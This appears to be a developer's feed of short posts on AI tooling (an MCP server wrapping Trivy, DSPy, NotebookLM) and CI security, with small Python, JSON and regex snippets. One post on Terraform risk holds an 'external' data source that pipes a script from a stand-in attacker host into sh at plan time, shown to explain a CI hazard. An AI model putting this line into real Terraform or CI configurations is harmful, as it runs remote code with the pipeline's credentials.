Sharing a quick proof-of-concept project: Cursor-MCP-Trivy.
I put together an MCP server that leverages Trivy to scan the active Cursor project for security vulnerabilities whenever Cursor's agent (Composer) changes a dependency file, e.g. adding a new dependency.
github.com/norbinsh/cur...
How does it work?
1. Cursor IDE (MCP Client): Serves as the development environment where code changes occur. With MCP support, Cursor's agent (Composer) has access to MCP tools.
2. MCP Server: Acts as an intermediary, receiving requests from the MCP client and orchestrating security scans and fixes by interfacing with Trivy.
3. Trivy: Performs security scans on the project to identify vulnerabilities and suggests fixes.
In this project, two tools are exposed: one for initiating Trivy scans and another for applying fixes. The LLM can choose when to use them based on its context.
Everything, including a demo, is in the repo above, so feel free to check it out. I included a detailed README that should help make things clearer as well.
If you have any questions or want to chat about this, DMs are open.
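As a rough sketch of the scan side (not the repo's actual code): the server can shell out to Trivy (e.g. `trivy fs --format json .`) and reduce the JSON report to just what the LLM needs to decide on a fix. The field names below follow Trivy's JSON report format; the sample data is dummy values.

```python
def summarize_trivy_report(report: dict) -> list[dict]:
    """Flatten a Trivy JSON report into a list of actionable findings."""
    findings = []
    for result in report.get("Results", []):
        # "Vulnerabilities" may be absent or null for clean targets.
        for vuln in result.get("Vulnerabilities") or []:
            findings.append({
                "id": vuln.get("VulnerabilityID"),
                "severity": vuln.get("Severity"),
                "package": vuln.get("PkgName"),
                "installed": vuln.get("InstalledVersion"),
                # A fix is available when Trivy reports a FixedVersion.
                "fix": vuln.get("FixedVersion"),
                "target": result.get("Target"),
            })
    return findings

# Dummy report shaped like `trivy fs --format json` output.
sample = {
    "Results": [{
        "Target": "requirements.txt",
        "Vulnerabilities": [{
            "VulnerabilityID": "CVE-0000-00000",  # placeholder ID
            "Severity": "HIGH",
            "PkgName": "somepkg",
            "InstalledVersion": "1.0.0",
            "FixedVersion": "1.0.1",
        }],
    }]
}

print(summarize_trivy_report(sample)[0]["fix"])
```

The "apply fix" tool can then bump the dependency to the reported `FixedVersion` and re-scan.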
Cursor's Privacy Mode starts OFF by default in the IDE, because clearly, they think sharing is caring.
Check your settings and decide what works for you.
www.cursor.com/security#inf...
Good luck!
Using ChatGPT's new Tasks feature as a website availability tool.
browser-use is pretty cool!
The repo for this demo I set up is here: github.com/norbinsh/kub...
gitcicd.com
A small platform I built that you can use to analyze a GitHub repo for potential risks in its Actions workflows. Give it a go!
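For flavor, here is one illustrative check such analysis might run (a sketch, not gitcicd's actual implementation): the classic "pwn request" pattern, where a `pull_request_target` workflow checks out the PR's head, letting untrusted code run with access to repository secrets.

```python
import re

# Privileged trigger: runs in the base repo's context, secrets available.
RISKY_TRIGGER = re.compile(r"^\s*pull_request_target\s*:", re.MULTILINE)
# Checking out the PR's head brings untrusted code into that context.
PR_HEAD_CHECKOUT = re.compile(r"github\.event\.pull_request\.head")

def flags_pwn_request(workflow_yaml: str) -> bool:
    """Flag the combination of a privileged trigger and an untrusted checkout."""
    return bool(RISKY_TRIGGER.search(workflow_yaml)
                and PR_HEAD_CHECKOUT.search(workflow_yaml))

risky = """
on:
  pull_request_target:
jobs:
  build:
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
"""
print(flags_pwn_request(risky))
```

A real analyzer would parse the YAML properly instead of using regexes, but the signal is the same.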
The Model Context Protocol (MCP) is an open standard for giving large language models secure, controlled access to tools and data sources.
"Think of MCP like a USB-C port for AI applications."
modelcontextprotocol.io/introduction
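As a rough illustration (simplified from the spec): MCP messages are JSON-RPC 2.0, so a client invoking a server-side tool looks roughly like the message below. The tool name and arguments here are hypothetical.

```json
{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "tools/call",
  "params": {
    "name": "scan_project",
    "arguments": { "path": "." }
  }
}
```

The server replies with a result the client (and its LLM) can act on, which is what makes the "USB-C port" analogy work: any client can talk to any server over the same message shapes.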
gitdiagram.com
This tool generates a Mermaid diagram from a Git(Hub) repository.
DSPy from Stanford NLP: a Python library for building multi-step LLM pipelines and prompt optimization.
dspy.ai
See in my attached example how it takes a tiny one-liner prompt, converts it (also using an LLM) into sub-questions, answers them, summarizes, and returns a final answer.
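The decompose, answer, summarize flow above can be sketched in plain Python. To be clear, this is NOT the DSPy API; `fake_lm` is a stand-in for a real model call so the control flow stays visible and runnable.

```python
def fake_lm(prompt: str) -> str:
    # Stand-in for an LLM call; returns canned text keyed on the task.
    if prompt.startswith("Decompose:"):
        return "What is X?; Why does X matter?"
    return f"Answer to: {prompt}"

def decompose(question: str) -> list[str]:
    # Ask the model to split one question into sub-questions.
    return [q.strip() for q in fake_lm(f"Decompose: {question}").split(";")]

def answer_all(subqs: list[str]) -> list[str]:
    # Answer each sub-question independently.
    return [fake_lm(q) for q in subqs]

def summarize(question: str, answers: list[str]) -> str:
    # Fold the intermediate answers back into one final answer.
    return fake_lm(f"Summarize for '{question}': " + " | ".join(answers))

question = "Explain X briefly"
final = summarize(question, answer_all(decompose(question)))
print(final)
```

DSPy's value-add over a hand-rolled pipeline like this is that each step is a declarative module whose prompts can be optimized automatically against data.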
Interesting take on how we often over-emphasize LLMs while neglecting the important role of building complete AI systems:
www.youtube.com/watch?v=vRTc...
1. The complete system running it, not just the LLM itself, is the key to unlocking the true potential of AI.
2. A powerful LLM is useless without a robust system to support it. This includes:
- Carefully engineered prompting strategies
- Effective sampling methods for text generation
- Integration with relevant tools (like databases and web access)
3. Even small language models can outperform giant ones when they are part of a well-designed system.
4. Data-driven optimization techniques (like those offered by DSPy) can help you automatically find the best prompting and sampling strategies for your system.
5. Regulation should focus on the capabilities and actions of the entire system, not just the LLM itself.
Some decent AI-related "freebies" at www.aiengineerpack.com. I am not affiliated with that site, just sharing in case it helps some others as well; I grabbed an annual Perplexity Pro sub for no cost. Good luck! (Oh, and it's always best to remove requested access once you are "done" with it.)
Running terraform plan on untrusted code isn't as safe as it seems. Most CI setups I know would allow developers to trigger this in the PR phase, before the PR has even gone through code review.
good read: snyk.io/blog/gitflop...
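The core risk can be shown with a minimal sketch (the URL and names here are hypothetical): `terraform plan` evaluates data sources, and the `external` data source executes an arbitrary local program at plan time, before any review or apply.

```hcl
# Hypothetical snippet a malicious PR could slip into a module:
# `terraform plan` evaluates data sources, so this program runs
# at plan time, before anyone reviews or approves the change.
data "external" "innocuous_lookup" {
  program = ["/bin/sh", "-c", "curl -s https://attacker.example/payload | sh"]
}
```

(The `external` provider expects JSON on stdout, so the plan may error afterwards, but by then the command has already run with the CI job's credentials.)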
Google and Kaggle have launched a comprehensive, no-cost Generative AI course. Each day focuses on key topics:
• Day 1: Foundational Models & Prompt Engineering
• Day 2: Embeddings and Vector Databases
• Day 3: Generative AI Agents
• Day 4: Domain-Specific LLMs
• Day 5: MLOps for Generative AI
Check out the first day's live stream here if interested: youtu.be/kpRyiJUUFxY?...
Been using Google's NotebookLM almost daily to "listen" to whitepapers or get quick intros to new topics with its podcast feature. It's my go-to for deep dives while on the move. Free and super convenient!
There are many! But for instance, I wanted to learn more about online payments from a system design perspective. So I went ahead and created a new collection, and pushed in quite a few relevant API docs pages from Stripe, some relevant blog posts from their engineering blog, as well as some relevant YouTube videos, and some whitepapers. All put together, it came out great. I really like how you can mix these sources together and just listen to the overall summary. Also, I noticed the instructions you can provide to the podcast generation request make a difference: I ask it to be technical and not skip any details, and I share with it what my purpose is and why I would like this podcast (e.g. to learn about a subject, or whatever the reason is).
Shoutout to AWS for the "Focus mode" in their docs: a simple but game-changing feature for reading without distractions. More platforms should definitely follow this.
Screenshot of AWS documentation page titled "Model distillation in Amazon Bedrock." The text explains the process of transferring knowledge from a teacher model to a student model using synthetic data. The page includes a "Focus mode" toggle and text size adjustment slider on the right sidebar.